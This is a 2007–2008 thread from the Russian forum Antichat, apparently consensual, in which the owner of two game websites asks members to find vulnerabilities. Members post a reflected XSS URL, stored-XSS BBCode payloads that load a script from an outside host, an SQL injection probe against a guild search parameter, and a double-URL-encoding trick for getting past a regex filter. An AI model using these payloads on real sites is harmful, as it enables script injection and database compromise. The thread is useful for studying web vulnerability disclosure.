Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   La2.Gaming.Su,Mu.Gaming.Su (https://forum.antichat.xyz/showthread.php?t=51889)

EST a1ien 24.10.2007 11:04
La2.Gaming.Su,Mu.Gaming.Su
 
http://la2.gaming.su
http://mu.gaming.su
Естественно за каждый баг с меня репа.

sw04 24.10.2007 17:01
вбуллетин и хтмл морда, разве это по правилам?

guest3297 24.10.2007 17:03
размести на сайте в корне
test.txt
c текстом test antichat.

EST a1ien 24.10.2007 17:10
Ок вечером сделаю щас просто с мобилы

2sw04 недумал что так тяжело догадатья про мод-реврайт

[dword] 24.10.2007 18:53
validator.php с форума стоило бы удалить ну или спрятать хотябы :) бэкапов не нашел вроде %),
админка следовательно MU_G_admincp/index.php

EST a1ien 24.10.2007 19:56
2[cash] создал

[dword] 24.10.2007 21:56
+ Не удалены инсталяционные файлы чата... ты бы хоть от дураков форум отгородил бы )

LLITiF 25.10.2007 09:45
validator.php убран.
чат удалён.

blackybr 25.10.2007 10:26
Открыта*

ЗЫ люди проверяйте не гейминг.су.. а сайты упомянутые ТС

Spyder 25.10.2007 18:18
BlackCats
это просто глюки мсскл. Переведи первую ошибку
Unable to connect to server: mssql_gaming80


*все норм работает

RenGen 25.10.2007 20:50
XSS

Код:
http://mu.gaming.su/index.php?page=comments&id=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
быра исправляй:)

EST a1ien 26.10.2007 13:27
Там в коментах вобще можно было добиться sql-inj. Не одна переменная в коментах не фильтровалась.

Пофиксил!!!

EST a1ien 26.10.2007 14:04
Ди и еще что думаете по поводу вот такой реализации BBcode
PHP код:
function bbcode($text)
{
    global $db_var;
    $text BBparseurls($text);
    $text " ".$text;

    $bbcodes1 = array(
    '$' => '$',
    '[b]' => '<strong>',
    '[/b]' => '</strong>',
    '[p]' => '<p>',
    '[/p]' => '</p>',
    '[u]' => '<u>',
    '[/u]' => '</u>',
    '[i]' => '<em>',
    '[/i]' => '</em>',
    '[hr]' => '<hr />',
    '[li]' => '<li>',
    '[_]' => '&nbsp;',
    '[__]' => '&nbsp; &nbsp;',
    '[red]' => '<span style="color:#F93737">',
    '[/red]' => '</span>',
    '[white]' => '<span style="color:#FFFFFF">',
    '[/white]' => '</span>',
    '[green]' => '<span style="color:#09DD09">',
    '[/green]' => '</span>',
    '[blue]' => '<span style="color:#018BFF">',
    '[/blue]' => '</span>',
    '[orange]' => '<span style="color:#FF9900">',
    '[/orange]' => '</span>',
    '[yellow]' => '<span style="color:#FFFF00">',
    '[/yellow]' => '</span>',
    '[purple]' => '<span style="color:#A22ADA">',
    '[/purple]' => '</span>',
    '[black]' => '<span style="color:#000000">',
    '[/black]' => '</span>',
    '[grey]' => '<span style="color:#B9B9B9">',
    '[/grey]' => '</span>',
    '[pink]' => '<span style="color:#FFC0FF">',
    '[/pink]' => '</span>',
    '[sky]' => '<span style="color:#D1F4F9">',
    '[/sky]' => '</span>',
    '[sea]' => '<span style="color:#171A97">',
    '[/sea]' => '</span>',
    '[sub]' => '<sub>',
    '[/sub]' => '</sub>',
    '[sup]' => '<sup>',
    '[/sup]' => '</sup>',
    '[quote]' => '<blockquote><hr />',
    '[/quote]' => '<hr /></blockquote>',
    '[br]' => '<br />'
    );
    $links=explode('|',$db_var['link']);
    $bbcodes2 = array(
    '\\[img\\]([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\[/img\\]' => '<img src="\\1.\\2" alt="" />',
    '\\[img=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/img\\]' => '<a href="\\1.\\2"><img src="\\3.\\4" alt="" /></a>',
    '\\[thumb=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/thumb\\]' => ' <a href="pfs.php?m=view&amp;v=\\3.\\4"><img src="\\1.\\2" alt="" /></a>',
    '\\[t=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/t\\]' => '<a href="\\3.\\4"><img src="\\1.\\2" alt="" /></a>',
    '\\[url=([^\\\'\;([]*)\\]([^\\[]*)\\[/url\\]' => $links[0].'"\\1">\\2'.$links[1],
    '\\[url\\]([^\\([]*)\\[/url\\]' => $links[0].'"\\1">\\1'.$links[1],
    '\\[urlb=([^\\\'\;([]*)\\]([^\\[]*)\\[/urlb\\]' => '<a class="ll3" target="_blank" href="\\1">\\2</a>',
    '\\[urlb\\]([^\\([]*)\\[/urlb\\]' => '<a class="ll3" target="_blank" href="\\1">\\1</a>',
    '\\[color=([a-zA-Z]*|\#?[0-9a-fA-F]{6})\\]([^\\[]*)\\[/color\\]' => '<span style="color:\\1">\\2</span>',
    '\\[class=([0-9a-zA-Z]{1,10})\\]([^\\[]*)\\[/class\\]' => '<span class="\\1">\\2</span>',
    '\\[style=([1-9]{1})\\]([^\\[]*)\\[/style\\]' => '<span class="bbstyle\\1">\\2</span>',
    '\\[size=([1-9]{1})\\]([^\\[]*)\\[/size\\]' => '<h\\1>\\2</h\\1>',
    '\\[email=([._A-z0-9-]+@[_A-z0-9-]+\.[.a-z]+)\\]([^\\[]*)\\[/email\\]' => '<a href="mailto:\\1">\\2</a>',
    '\\[email\\]([._A-z0-9-]+@[_A-z0-9-]+\.[.a-z]+)\\[/email\\]' => '<a href="mailto:\\1">\\1</a>',
    '\\[user=([0-9]+)\\]([A-z0-9_\. ]+)\\[/user\\]' => '<a href="users.php?m=details&amp;id=\\1">\\2</a>',
    '\\[ac=([^\\[]*)\\]([^\\[]*)\\[/ac\\]' => '<acronym title="\\1">\\2</acronym>',
    '\\[list=([a-zA-Z]*)\\]([^\\[]*)\\[/list\\]' => '<ul type="\\1">\\2</ul>',
    '\\[list\\]([^\\[]*)\\[/list\\]' => '<ul>\\1</ul>',
    '\\[icq\\]([1-9]{1,9})\\[/icq\\]' => '<a href="http://www.icq.com/\\1#pager"><img border=0 src="http://status.icq.com/online.gif?icq=\\1&amp;img=5" alt="" /></a>',
    '\\[quote=([^\\[]*)\\]' => '<blockquote>\\1<hr />',
    '\\[colleft\\]([^\\[]*)\\[/colleft\\]' => '<div class="colleft">\\1</div>',
    '\\[colright\\]([^\\[]*)\\[/colright\\]' => '<div class="colright">\\1</div>',
    '\\[center\\]([^\\[]*)\\[/center\\]' => '<div style="text-align:center;">\\1</div>',
    '\\[right\\]([^\\[]*)\\[/right\\]' => '<div style="text-align:right;">\\1</div>',
    '\\[left\\]([^\\[]*)\\[/left\\]' => '<div style="text-align:left;">\\1</div>'
    );

    foreach($bbcodes1 as $bbcode => $bbcodehtml)
    { $text str_replace($bbcode,$bbcodehtml,$text); }

    foreach($bbcodes2 as $bbcode => $bbcodehtml)
    { $text eregi_replace($bbcode,$bbcodehtml,$text); }

    return(substr($text,1));
}


/* ------------------ */

function BBparseurls($text)
{
    $text ' '.$text;
    $text preg_replace("#([\n ])([a-z0-9]+?)://([^\t \n\r]+)#i""\\1[urlb]\\2://\\3[/urlb]"$text);
    $text preg_replace("#([\n ])([a-z0-9]+?)://([^\t \n\r]+)#i""\\1[url]\\2://\\3[/url]"$text);
    $text preg_replace("#([\n ])([a-z0-9-_.]+?@[A-z0-9-]+\.[^,\t \n\r]+)#i""\\1[email]\\2[/email]"$text);
    return(substr($text,1));

Нету тут нечего критического?

Ponchik 04.01.2008 21:51
В верхнем правом углу ссылка на регу ведёт на мертвую ссыль http://mu.gaming.su/register.html

Macro 04.01.2008 22:28
Цитата:
Сообщение от EST a1ien
Ди и еще что думаете по поводу вот такой реализации BBcode

Нету тут нечего критического?
Активные xss

Код:
[img]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/img]

[thumb=asdf.jpg]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/thumb]

[t=asdf.jpg]"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg[/t]
Короче говоря там активные xss почти в каждом теге есть :)

Scipio 05.01.2008 13:03
хм cервер off не успел, а была скуля:
Цитата:
http://mu.gaming.su/index.php?page=searchguild&guild=DarkS'/**/order/**/by/**/11+--+
ну вобщем там скуля налицо была, теперь вобще ничего не отображается

EST a1ien 05.03.2008 22:06
Ребята где вы их там нашли???? я эти баге на сайте и не нашел. Скуля там по определению быть не может! особенно того что ты пихал
Код:
if(isset($_GET['guild']))
                {
                $guild = $_GET['guild'];
                                   
                if (eregi("[a-zA-Z0-9_-~/\%()=+><]", $guild))
                {
Да и XSS не подтвердились.

Isis 06.03.2008 02:24
EST a1ien, все можно заменить на %XX , где хх допустим теже кавычки
%2527 подходит под твою регулярку

EST a1ien 08.03.2008 20:29
Ну заменить то можно. Но он пойдет как связка символов %27 тоесть в запросе будет %27 и все. Проверял. Или я вчемто не прав?

9822 15.03.2008 19:12
под world of warcraft зделай дизайн =)


Время: 15:40